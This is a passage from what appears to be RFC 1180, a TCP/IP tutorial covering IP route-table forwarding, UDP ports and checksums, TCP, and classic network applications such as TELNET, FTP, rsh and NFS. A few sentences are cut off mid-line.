   does an ARP table translation for devnetrouter's IP address and sends
   the IP packet directly to devnetrouter through Alpha's interface
   number 1.  The IP packet still contains the destination address of

   The IP packet arrives at delta's development network interface and is
   passed up to delta's IP module.  The destination IP address is
   examined and because it does not match any of delta's own IP
   addresses, delta decides to forward the IP packet.

   Delta's IP module extracts the network portion of the destination IP
   address (223.1.3) and scans its route table for a matching network
   field.  Delta's route table looks like this:

 |network      direct/indirect flag  router           interface number|
 |development  direct                <blank>          1               |
 |factory      direct                <blank>          3               |
 |accounting   direct                <blank>          2               |
                     TABLE 12.  Delta's Route Table

   Below is delta's table printed again, without the translation to

 |network      direct/indirect flag  router           interface number|
 |223.1.2      direct                <blank>          1               |
 |223.1.3      direct                <blank>          3               |
 |223.1.4      direct                <blank>          2               |
              TABLE 13.  Delta's Route Table with Numbers

   The match is found on the second entry.  IP then sends the IP packet
   directly to epsilon through interface number 3.  The IP packet
   contains the IP destination address of epsilon and the Ethernet
   destination address of epsilon.

   The IP packet arrives at epsilon and is passed up to epsilon's IP
   module.  The destination IP address is examined and found to match
   with epsilon's IP address, so the IP packet is passed to the upper
   protocol layer.

5.11  Routing Summary

   When a IP packet travels through a large internet it may go through
   many IP-routers before it reaches its destination.  The path it takes
   is not determined by a central source but is a result of consulting
   each of the routing tables used in the journey.  Each computer
   defines only the next hop in the journey and relies on that computer
   to send the IP packet on its way.

5.12  Managing the Routes

   Maintaining correct routing tables on all computers in a large
   internet is a difficult task; network configuration is being modified
   constantly by the network managers to meet changing needs.  Mistakes
   in routing tables can block communication in ways that are
   excruciatingly tedious to diagnose.

   Keeping a simple network configuration goes a long way towards making
   a reliable internet.  For instance, the most straightforward method
   of assigning IP networks to Ethernet is to assign a single IP network
   number to each Ethernet.

   Help is also available from certain protocols and network
   applications.  ICMP (Internet Control Message Protocol) can report
   some routing problems.  For small networks the route table is filled
   manually on each computer by the network administrator.  For larger
   networks the network administrator automates this manual operation
   with a routing protocol to distribute routes throughout a network.

   When a computer is moved from one IP network to another, its IP
   address must change.  When a computer is removed from an IP network
   its old address becomes invalid.  These changes require frequent
   updates to the "hosts" file.  This flat file can become difficult to
   maintain for even medium-size networks.  The Domain Name System helps
   solve these problems.

6.  User Datagram Protocol

   UDP is one of the two main protocols to reside on top of IP.  It
   offers service to the user's network applications.  Example network
   applications that use UDP are:  Network File System (NFS) and Simple
   Network Management Protocol (SNMP).  The service is little more than
   an interface to IP.

   UDP is a connectionless datagram delivery service that does not
   guarantee delivery.  UDP does not maintain an end-to-end connection
   with the remote UDP module; it merely pushes the datagram out on the
   net and accepts incoming datagrams off the net.

   UDP adds two values to what is provided by IP.  One is the
   multiplexing of information between applications based on port
   number.  The other is a checksum to check the integrity of the data.

6.1  Ports

   How does a client on one computer reach the server on another?

   The path of communication between an application and UDP is through
   UDP ports.  These ports are numbered, beginning with zero.  An
   application that is offering service (the server) waits for messages
   to come in on a specific port dedicated to that service.  The server
   waits patiently for any client to request service.

   For instance, the SNMP server, called an SNMP agent, always waits on
   port 161.  There can be only one SNMP agent per computer because
   there is only one UDP port number 161.  This port number is well
   known; it is a fixed number, an internet assigned number.  If an SNMP
   client wants service, it sends its request to port number 161 of UDP
   on the destination computer.

   When an application sends data out through UDP it arrives at the far
   end as a single unit.  For example, if an application does 5 writes
   to the UDP port, the application at the far end will do 5 reads from
   the UDP port.  Also, the size of each write matches the size of each

   UDP preserves the message boundary defined by the application.  It
   never joins two application messages together, or divides a single
   application message into parts.

6.2  Checksum

   An incoming IP packet with an IP header type field indicating "UDP"
   is passed up to the UDP module by IP.  When the UDP module receives
   the UDP datagram from IP it examines the UDP checksum.  If the
   checksum is zero, it means that checksum was not calculated by the
   sender and can be ignored.  Thus the sending computer's UDP module
   may or may not generate checksums.  If Ethernet is the only network
   between the 2 UDP modules communicating, then you may not need
   checksumming.  However, it is recommended that checksum generation
   always be enabled because at some point in the future a route table
   change may send the data across less reliable media.

   If the checksum is valid (or zero), the destination port number is
   examined and if an application is bound to that port, an application
   message is queued for the application to read.  Otherwise the UDP
   datagram is discarded.  If the incoming UDP datagrams arrive faster
   than the application can read them and if the queue fills to a
   maximum value, UDP datagrams are discarded by UDP.  UDP will continue
   to discard UDP datagrams until there is space in the queue.

7.  Transmission Control Protocol

   TCP provides a different service than UDP.  TCP offers a connection-
   oriented byte stream, instead of a connectionless datagram delivery
   service.  TCP guarantees delivery, whereas UDP does not.

   TCP is used by network applications that require guaranteed delivery
   and cannot be bothered with doing time-outs and retransmissions.  The
   two most typical network applications that use TCP are File Transfer
   Protocol (FTP) and the TELNET.  Other popular TCP network
   applications include X-Window System, rcp (remote copy), and the r-
   series commands.  TCP's greater capability is not without cost: it
   requires more CPU and network bandwidth.  The internals of the TCP
   module are much more complicated than those in a UDP module.

   Similar to UDP, network applications connect to TCP ports.  Well-
   defined port numbers are dedicated to specific applications.  For
   instance, the TELNET server uses port number 23.  The TELNET client
   can find the server simply by connecting to port 23 of TCP on the
   specified computer.

   When the application first starts using TCP, the TCP module on the
   client's computer and the TCP module on the server's computer start
   communicating with each other.  These two end-point TCP modules
   contain state information that defines a virtual circuit.  This
   virtual circuit consumes resources in both TCP end-points.  The
   virtual circuit is full duplex; data can go in both directions
   simultaneously.  The application writes data to the TCP port, the
   data traverses the network and is read by the application at the far

   As with all sliding window protocols, the protocol has a window size.
   The window size determines the amount of data that can be transmitted
   before an acknowledgement is required.  For TCP, this amount is not a
   number of TCP segments but a number of bytes.

8.  Network Appliations

   Why do both TCP and UDP exist, instead of just one or the other?

   They supply different services.  Most applications are implemented to
   use only one or the other.  You, the programmer, choose the protocol
   that best meets your needs.  If you need a reliable stream delivery
   service, TCP might be best.  If you need a datagram service, UDP
   might be best.  If you need efficiency over long-haul circuits, TCP
   might be best.  If you need efficiency over fast networks with short
   latency, UDP might be best.  If your needs do not fall nicely into
   these categories, then the "best" choice is unclear.  However,
   applications can make up for deficiencies in the choice.  For
   instance if you choose UDP and you need reliability, then the
   application must provide reliability.  If you choose TCP and you need
   a record oriented service, then the application must insert markers
   in the byte stream to delimit records.

   What network aplications are available?

   There are far too many to list.  The number is growing continually.
   Some of the applications have existed since the beginning of internet
   technology: TELNET and FTP.  Others are relatively new: X-Windows and
   SNMP.  The following is a brief description of the applications
   mentioned in this tutorial.


   TELNET provides a remote login capability on TCP.  The operation and
   appearance is similar to keyboard dialing through a telephone switch.
   On the command line the user types "telnet delta" and receives a
   login prompt from the computer called "delta".

   TELNET works well; it is an old application and has widespread
   interoperability.  Implementations of TELNET usually work between
   different operating systems.  For instance, a TELNET client may be on
   VAX/VMS and the server on UNIX System V.

8.2  FTP

   File Transfer Protocol (FTP), as old as TELNET, also uses TCP and has
   widespread interoperability.  The operation and appearance is as if
   you TELNETed to the remote computer.  But instead of typing your
   usual commands, you have to make do with a short list of commands for
   directory listings and the like.  FTP commands allow you to copy
   files between computers.

8.3  rsh

   Remote shell (rsh or remsh) is one of an entire family of remote UNIX
   style commands.  The UNIX copy command, cp, becomes rcp.  The UNIX
   "who is logged in" command, who, becomes rwho.  The list continues
   and is referred to collectively to as the "r" series commands or the
   "r*" (r star) commands.

   The r* commands mainly work between UNIX systems and are designed for
   interaction between trusted hosts.  Little consideration is given to
   security, but they provide a convenient user environment.

   To execute the "cc file.c" command on a remote computer called delta,
   type "rsh delta cc file.c".  To copy the "file.c" file to delta, type
   "rcp file.c delta:".  To login to delta, type "rlogin delta", and if
   you administered the computers in a certain wa, you will not be
   challenged with a password prompt.

8.4  NFS

   Network File System, first developed by Sun Microsystems Inc, uses
   UDP and is excellent for mounting UNIX file systems on multiple
   computers.  A diskless workstation can access its server's hard disk
   as if the disk were local to the workstation.  A single disk copy of
   a database on mainframe "alpha" can also be used by mainframe "beta"
   if the database's file system is NFS mounted commands to
   use the NFS mounted disk as if it were local disk.

8.5  SNMP

   Simple Network Management Protocol (SNMP) uses UDP and is designed
   for use by central network management stations.  It is a well known
   fact that if given enough data, a network manager can detect and
   diagnose network problems.  The central station uses SNMP to collect
   this data from other computers on the network.  SNMP defines the
   format for the data; it is left to the central station or network
   manager to interpret the data.

8.6  X-Window

   The X Window System uses the X Window protocol on TCP to draw windows
   on a workstation's bitmap display.  X Window is much more than a
   utility for drawing windows; it is entire philosophy for designing a
   user interface.

9.  Other Information

   Much information about internet technology was not included in this
   tutorial.  This section lists information that is considered the next
   level of detail for the reader who wishes to learn more.

     o administration commands: arp, route, and netstat
     o ARP: permanent entry, publish entry, time-out entry, spoofing
     o IP route table: host entry, default gateway, subnets
     o IP: time-to-live counter, fragmentation, ICMP
     o RIP, routing loops
     o Domain Name System

10.  References

   [1] Comer, D., "Internetworking with TCP/IP Principles, Protocols,
       and Architecture", Prentice Hall, Englewood Cliffs, New Jersey,
       U.S.A., 1988.

   [2] Feinler, E., et al, DDN Protocol Handbook, Volume 2 and 3, DDN
       Network Information Center, SRI International, 333 Ravenswood
       Avenue, Room EJ291, Menlow Park, California, U.S.A., 1985.

   [3] Spider Systems, Ltd., "Packets and Protocols", Spider Systems
       Ltd., Stanwell Street, Edinburgh, U.K. EH6 5NG, 1990.

11.  Relation to other RFCs

   This RFC is a tutorial and it does not UPDATE or OBSOLETE any other

12.  Security Considerations

   There are security considerations within the TCP/IP protocol suite.
   To some people these considerations are serious problems, to others
   they are not; it depends on the user requirements.
   This tutorial does not discuss these issues, but if you want to learn
   more you should start with the topic of ARP-spoofing, then use the
   "Security Considerations" section of RFC 1122 to lead you to more